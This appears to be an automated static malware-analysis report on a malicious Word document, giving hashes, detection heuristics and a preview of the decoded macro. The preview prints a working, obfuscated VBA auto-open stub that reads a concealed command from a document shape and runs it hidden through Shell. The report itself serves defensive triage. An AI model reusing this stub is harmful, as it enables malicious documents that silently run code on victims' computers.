Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06931ceab2aab4aa…

MALICIOUS

Office (OLE)

131.6 KB Created: 2018-12-07 19:26:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 747bd9f7923e507e4198fbac12a16c58 SHA-1: 6fec5a6ed9dfbc6965f602690107ee61bfb33623 SHA-256: 06931ceab2aab4aa08c6fe91b3c59a63c51931bf32eef022aebfd78ad3f2a629
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Malware.Generic-6776293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6776293-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(twRquVZa, imwLJ), QAmQj)
         Set wbNvXBWPqiYVORd = JUEGzdZiqiFYkahonXNWZ
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
fzqAH
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6611 bytes
SHA-256: 25489921e00612c266b0232c56446a61b995a70827df33bcb0482f67d8a643cc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
169 of 203 identifiers look randomly generated (e.g. 'VKXzWdMkJtGaawtIbMiIPRkw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SkQIktkDvUAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
fzqAH
End Sub

Attribute VB_Name = "tzIfdLKPAkdT"
Function fzqAH()
On Error Resume Next
         Set ttCLOVKtiqPPkF = QEwWrAkLEOqSviWuFt
      QJnfHozATOLtvBWO = LibCIizzYCPLIwJVXpLdY
      isARwtUvRZTmiaSJHbqijmk = KRBYXMKlKUwjCrlDcdlprV / CLng(91700636) * 228697503 / Tan(17857619) + iknqHvHKGisvYFPic - Cos(95573804) + (197046274 / Int(GQpmFGBuzpESWIdZwUMBb))
         Set jKGOiTjmIpElYkzbMtmLaNAZ = YUWLWOQKmZrWtkLCoPLQjPM
      mqHYTXVJjVGzJal = oalLFFTJaIlzpJJIIOZ
      HrqPDiqYiMtNdkcIdABj = wwKlYUXLzrvBFSzjWH / CLng(155141706) * 96833386 / Tan(309417374) + NPXTEjBiHMsJJsjdfOTM - Cos(215810836) + (141764872 / Int(MYRiYHtiScSkuOEPqJSjiIvJ))
         Set kGCGSibHJwODnWQILRWo = TPPWPqdDkPJEOklazq
      MZmYliawjISjndJQqmjDnzEY = EzZliiNbZcwhqisouzuSj
      aETunNnJOVNrhiBKBZ = IOBNjzIrOtAJGB / CLng(224030786) * 163125973 / Tan(139298940) + kvAnPNbTzwNnjwUNX - Cos(47542431) + (167491099 / Int(juiWZQOLGqzFftQiEVznmQA))
         Set BaLpCWnvJJwjDPrVNu = mBljGwcHwaGEFuqtbc
      shIZOZZCNqLiYEZW = QqFrZPqUDFrpNWQsD
      mdcWKjvORlvizj = XdkXSSRSELTiMATvlUC / CLng(252900390) * 294268554 / Tan(279968004) + jYvKwFYUGKRqtfUlkVLXKrw - Cos(232584906) + (96822958 / Int(qJNzufhjEzWHTMfqMXvKaPRj))
         Set OWTUYwkbTNZOwwkPtpszwYB = fFdiuGwhPCEWflm
      dkFtbwiPqsHwdEuqVNp = UBhMOswtuNjHDUVMTH
      iaOrBzAELHNBRwSDbDsi = zkVcIAvJiiWNiGsGKfNOn / CLng(258580687) * 250732315 / Tan(211820281) + RLkQuIadvkqsPtzE - Cos(308309858) + (191446902 / Int(rojpazRYfPvKwoQqpKt))
Set hSjoZM = SkQIktkDvUAQ.Shapes(AOOHJQlJK + "LpMSUrnBv" + VOcBwrT).TextFrame
         Set oRXBdmqUjlQiXHYnC = uuCMGwVjvuAPahuvadOYEins
      usFUIGJHditLbLY = uqvTRKijbjuZdrLGKEMG
      OnorIzwBkwRptJssZ = kJVsbLkdmWmBXzSPjCHbJN / CLng(238055162) * 227142253 / Tan(287232974) + cjkiTOlObwvVMcHiKbOjb - Cos(123404293) + (155134662 / Int(dpkzjXZmBtiBsEDXPIXV))
         Set rwwvQaAupadcaqbcDHF = tcWSwCbDkkSXbcdptvjbZhpQ
      IGKYUZMJbjOZjwOzwKFI = AwNmiIYiWLnGoow
      fQLFOAvOPNwUbcXjH = HIzlmRoiFVbSrKRiRt / CLng(306386352) * 20923723 / Tan(289605715) + CwWULDDtnEzRho - Cos(127570594) + (297911498 / Int(tQkvanzWmDsLdoEfGFwP))
         Set vERjAajaTiDHnzKq = PnjEamUoKvHaTVGE
      APXjiAjkjtnWAYSmaYH = HVSwuqfcAzJzCKwuSjj
      CUusjSKWpntwwdVfzbmsVE = jjqUpbXUtrVZnaZQbfInN / CLng(39468782) * 84597028 / Tan(333741208) + pRzruoRwkNJpwUvSTzF - Cos(194625929) + (24390320 / Int(EXKKMNRWaWrvzJZczDDbD))
twRquVZa = hSjoZM.ContainingRange + iUiCITIG + GEidn + WIUSu + GYrTTvB + zLqXjO + zGcCUR + nYpmzYtb + jcomOJwm + LfjFob
         Set RzCvDNsDjkHbiWlkMGVLj = zNFokzUmFRlBLX
      jlnMXWtEQsrOaQBaLBPApp = dvjwiqpcKOzcVizJf
      JpwsitVErazwXzt = KRoZOOaPhAcofsMsku / CLng(211336318) * 3683625 / Tan(124731041) + MpaazPcOqAizYhUFquOhL - Cos(221818473) + (110785398 / Int(YwNHLcRtCZEzwoPKmSJc))
         Set VKXzWdMkJtGaawtIbMiIPRkw = GIXYsCpWTZYWZsOC
      judFWuswWwVrhDaZ = PVoMQrQDHZVmCTUGChqUGk
      iZVEUfmVzwmcsNBSD = CPUXLUiBkfVkFjfH / CLng(64972623) * 253804740 / Tan(307725382) + vXVDXqPqbtAOmGEVtHOBZT - Cos(307944392) + (43938528 / Int(NrGzlDOYQRitQzVEoZriHzwc))
         Set QbJCiktfwciZmLuGiGSovLS = YwQTWApJBjcojcEmHKibHbsA
      PRpSNzEIKdmTaJvmZYDjGWC = fjldrrzDQYGjAr
      lXfZzSSjBnoiDpQotPnmjM = RSjiDBCLlhkRLazDiMz / CLng(235175962) * 276376059 / Tan(18861446) + tOAkNUMEHZwNGSj - Cos(102843603) + (204572431 / Int(bCATXENvLFahclOJmUDRprZd))
         Set VzREhtVkFmYdbIdkcUK = BaqraOwJzAmcOlGJanEjm
      zdnTiLhJTtjOXuIaiSwMmEA = PqBTJpQbwKaNEGflcohsszOL
      AJlmaEudqDsJNz = dIPMTvWXnLjwXHDPbqTJ / CLng(210882123) * 201962536 / Tan(270771903) + FjjNDnbOpCOkjBrEdmw - Cos(175857905) + (280079089 / Int(XVnoQTtpwwTrGnM))
         Set PIRPvuRkVBDZBHhrfHkTL = TmYoChfzDuBRPvddbt
      GJhjFYYZZVSqlau = fqHrkFYwJYjrmOBfqKELmF
      QdHFblDPqUFwmUBYB = jXjohmLTmzaWjDZYqOczw / CLng(82358312) * 35642637 / Tan(58361972) + XhPOKplCZDilcwUtIzEoUkC - Cos(165826308) + (97193744 / Int(nvBpWRXvJFvEbKoTKAqm))
         Set IwTaTZYjitHkpHTXMdHXPfC = iXAJKQoswclBhA
      JEkruoQTJkwKwzhfcwOsw = OVOEOmNVSpLvwTioIQR
      rZLFrvRzJETHmk = PcpZiGnRJwBzNAnnzarhoJ / CLng(59275373) * 87714812 / Tan(130999021) + QMOWDJNdPLTrnwDICG - Cos(275793668) + (314121087 / Int(wVQVhuDBGTbFKp))
Const imwLJ = 0
         Set nTZdQozUIErRvERwSktqthFc = CqlfAmShsNcQAbM
      wnbDzYLiEpSEwDFOwY = zLoIRZkCqpfSJhXwu
      YFdfHbKTNjpHOTbMOHHf = iPWUpYXJXbGLkYTl / CLng(121534872) * 31558406 / Tan(83799357) + wMANjaLqwSPoPTtpGLRDnKpI - Cos(226202891) + (319236205 / Int(vIbwDvhLSPJlOMjNELSw))
         Set VoOBEnFjslKErzIjiiQRj = iEbAJhwPuqwHtM
      MBjRhcpoPwsTKNmnND = JKaEdYkdrTHkGwKWj
      AwaoQLCRNoCHCjDbCMlzD = wzzUINmXzqGENFqUuPCLLwa / CLng(239840787) * 112026507 / Tan(158713621) + itzkjfHCbrvCoipoLAwV - Cos(331514527) + (243599610 / Int(SWvrhzZNDkhIdCGXYGDPd))
         Set WrikjANAGtGKJWJFs = nYHMEHdOKrzGkIItPNvpju
      DMQaABVAYtvLqKK = bHRqWAAJwCQGvKCDsQEzoh
      NorbNpwRjFbTiRDlDMHb = lPEOrrSZGKwuiEBiYnTCkhAU / CLng(281979512) * 126311239 / Tan(245963113) + fAnhFicZnNWzdscucYENCH - Cos(205068218) + (165655347 / Int(ZNDOjXXGiuFXQozccrKQVY))
         Set EJHiwjFdazJPcCofu = LbhXMCGlFHjnqqAzMi
      ZulMVQVnmzRTKbHzclhzEY = dwwnJSPfqFsUcaOL
      qPTlnnVLjsXMili = hHOYcMUXUbNSGf / CLng(157301389) * 90357242 / Tan(167463301) + GpEbpKbbZarTLUKTvSA - Cos(258098237) + (201004045 / Int(uwRMZDFDUJmDftwGREzA))
         Set ESnUSiYuhhfhJmNIAFcfu = BMloIIamOqbWjHczpnc
      RbMXAviOjCudnfQbjdV = UvSpGmFFfBQoDUHZz
      oMdLCMvwiBqBQLSL = VIWRNqYjimGaTXq / CLng(179343571) * 144318200 / Tan(272852248) + mJtGtIDDPilEWrO - Cos(246247624) + (115868003 / Int(waWFcTZpXPizauWJYzcB))
         Set RwwriAYOJDCjhkSErlwOmlzC = hvHLkfETbluHFCwrmBN
      PHfSRjKaPMjwwTAEQCZ = wNGwYzljAWAjlaIaQpt
      UdEOFzKlCsbjbp = CBhuUuaasMwLVKZnbJWD / CLng(139206002) * 59019974 / Tan(285067997) + amAhHvQHvzFZivZItDLCImp - Cos(176227378) + (184544088 / Int(AaFmItJoThutSz))
JmJEz = Array(jiFmZwZO, hjZhEkoZ, EqhMSR, Interaction _
. _
Shell(twRquVZa, imwLJ), QAmQj)
         Set wbNvXBWPqiYVORd = JUEGzdZiqiFYkahonXNWZ
      flmnAQWJUYwoQV = tFSBjFswwfPBjhqDHI
      pTUMcJHjKhZvJLS = SuVpzmpoHkOncdUrfKfDZsp / CLng(288276301) * 185438384 / Tan(166786445) + PYjFpRnYJlTJDifFruUEj - Cos(85093046) + (225779536 / Int(zjOUZEdNXEaPXfZVo))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.